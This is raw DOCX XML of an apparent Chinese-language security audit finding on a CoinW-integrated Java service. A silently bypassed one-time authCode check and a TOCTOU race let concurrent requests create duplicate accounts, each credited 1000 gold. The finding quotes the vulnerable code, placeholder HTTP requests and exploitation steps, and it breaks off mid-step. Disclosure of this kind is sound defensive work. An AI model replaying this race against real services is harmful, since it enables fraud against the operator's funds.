          <w:numId w:val="111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：业务逻辑安全绕过 / 资金安全 / 并发竞态（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="111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11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：无需认证，持有合法 CoinW authCode 即可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getOrCreateMainUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的完整调用链中，存在两个相互叠加的设计缺陷，联合导致同一 authCode 可被多次使用，从而创建多个初始金币账户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷一：`consumeAuthCodeOnce` 对 `redisTemplate == null` 的静默绕过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private void consumeAuthCodeOnce(String authCode) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (redisTemplate == null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;  // ← 静默放行，不抛异常、不记录日志、不拒绝请求</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Boolean firstUse = redisTemplate.opsForValue().setIfAbsent(key, "1", AUTH_CODE_USED_TTL);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (Boolean.FALSE.equals(firstUse)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("授权码已使用或无效");</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redisTemplate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 null（Redis 未注入、Bean 注入失败、或 Spring 条件注入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>required=false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），该方法直接返回，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>authCode 一次性保护完全失效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，authCode 可被无限次重复消费。代码中已存在显式的 null 判断并选择静默返回而非 fail-fast，表明该字段在设计上存在可能为 null 的预期。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷二：外部 API 调用在 authCode 消费之前（TOCTOU 窗口）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CoinWUserInfoVO info = coinWService.getUserInfo(authCode);  // ← Step 1：对外调用，authCode 此时仍"未消费"</w:t>
              <w:br/>
              <w:t>if (info == null ...) { throw ...; }</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>consumeAuthCodeOnce(authCode);  // ← Step 2：消费标记，与 Step 1 之间存在时间窗口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在 Step 1 调用 CoinW 外部接口返回成功到 Step 2 写入 Redis 之间，存在明确的 TOCTOU 窗口。若 CoinW 侧不在首次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getUserInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用后立即使 authCode 失效，并发的两个请求可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时通过 Step 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（均获取到有效的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>openId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），然后再竞争 Step 2 的 Redis SETNX。仅当 Redis 正常工作时，SETNX 的原子性确保只有一个请求获胜；一旦 Redis 为 null，两个请求均跳过 SETNX，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>全部进入用户创建分支</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联合攻击路径（Redis 不可用时）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个并发请求携带同一 authCode 同时到达 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/main</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">均通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getUserInfo(authCode)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 获取相同的 openId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>consumeAuthCodeOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 因 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>redisTemplate == null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均静默返回</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getOrCreateMainUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标注了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未使用 `SELECT FOR UPDATE` 或应用层锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；两个并发事务均执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findByOpenId(openId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并读到"不存在"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个事务均进入分支 3（创建新用户），各自执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createUser(0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>createUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为每个新账户分配 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserAccount.goldBalance = 1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（1000金币）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若数据库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>openId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 列无唯一约束，两个账户均持久化成功；攻击者从单个 authCode 获得 2 个账号与 2000 金币</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/api/user/main</w:t>
              <w:br/>
              <w:t xml:space="preserve">  └─ TokenAuthFilter: /api/user/main 在 NO_TOKEN_PATTERNS 中，直接放行，无需 Token</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  └─ SignAuthTestFilter: /api/user/** 在 SIGN_TEST_PATTERNS 中，需要签名（若 properties.isEnabled()==false 则亦跳过）</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入口：UserController.java</w:t>
              <w:br/>
              <w:t>// MainLoginForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   String authCode;       ← 攻击者可控，用于换取 openId</w:t>
              <w:br/>
              <w:t>//   String languageCode;</w:t>
              <w:br/>
              <w:t>//   Long guestUserId;</w:t>
              <w:br/>
              <w:t>@PostMapping("/main")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;LoginVO&gt; getCoinwUserInfo(@RequestBody MainLoginForm form, HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    loginRateLimitService.checkMainLogin(request.getRemoteAddr());  // IP 限流（非 authCode 粒度限流）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Long guestTokenUserId = resolveOptionalBearerUserId(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Long guestUserId = resolveGuestUserIdForMain(form.getGuestUserId(), guestTokenUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserExtDto userExtDto = userService.getOrCreateMainUser(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            guestUserId, form.getAuthCode(), form.getLanguageCode(), guestTokenUserId);  // ← authCode 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 核心逻辑：UserService.java#getOrCreateMainUser</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserExtDto getOrCreateMainUser(Long guestUserId, String authCode, ...) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    CoinWUserInfoVO info = coinWService.getUserInfo(authCode);  // ← Step 1：外部调用，authCode 此刻尚未消费</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (info == null || info.getOpenId() == null ...) { throw ...; }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    consumeAuthCodeOnce(authCode);  // ← Step 2：消费标记；与 Step 1 之间的窗口 = TOCTOU</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ... guestUserId 分支（有 Token 保护，不在此次攻击路径上）...</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;User&gt; existingOpt = userRepository.findByOpenId(openId);  // ← 并发时两个事务均读到"不存在"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (existingOpt.isPresent()) { ... return; }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // 3. 新建主态用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User newUser = createUser(0);  // ← 两个并发事务均进入此分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    newUser = userRepository.save(newUser);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：UserService.java#consumeAuthCodeOnce</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>priva</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>te void consumeAuthCodeOnce(String authCode) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (redisTemplate == null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;  // ← 漏洞点：静默绕过，不抛异常、不告警，authCode 一次性保护完全失效</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String key = AUTH_CODE_USED_PREFIX + hashAuthCode(authCode);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Boolean firstUse = redisTemplate.opsForValue().setIfAbsent(key, "1", AUTH_CODE_USED_TTL);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (Boolean.FALSE.equals(firstUse)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("授权码已使用或无效");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 资金影响：UserService.java#createUser</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>protected User createUser(int isNewUser) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user = userRepository.save(user);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = new UserAccount();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setUserId(user.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(BigDecimal.valueOf(1000));  // ← 每个新账户获得 1000 金币</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setUsdtBalance(BigDecimal.ZERO);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);  // ← 若创建两个账户则发放 2000 金币</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以下展示在 Redis 不可用场景下的并发利用方式：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/api/user/main HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;unix_ms_timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;unique_nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_hmac_signature&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"authCode":"&lt;valid_coinw_authcode&gt;","languageCode":"zh-CN"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时并发发送第二个请求（authCode 相同，nonce 不同以通过签名重放检测）：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/api/user/main HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;unix_ms_timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;unique_nonce_2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_hmac_signature_with_nonce_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"authCode":"&lt;valid_coinw_authcode&gt;","languageCode":"zh-CN"}</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利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1127"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">从 CoinW 获取一个有效的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>authCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（正常授权流程）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>确认或等待目标服务 Redis 不可用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>redisTemplate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为 null）——或在集成测试/staging 环境中 Redis 未配置时复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1129"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>authCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时发出 N 个并发 POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/user/main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求（不带 guestUserId，不带 Bearer Token）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1130"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若数据库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.open_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 列无唯一约束，各并发请求均通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByOpenId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
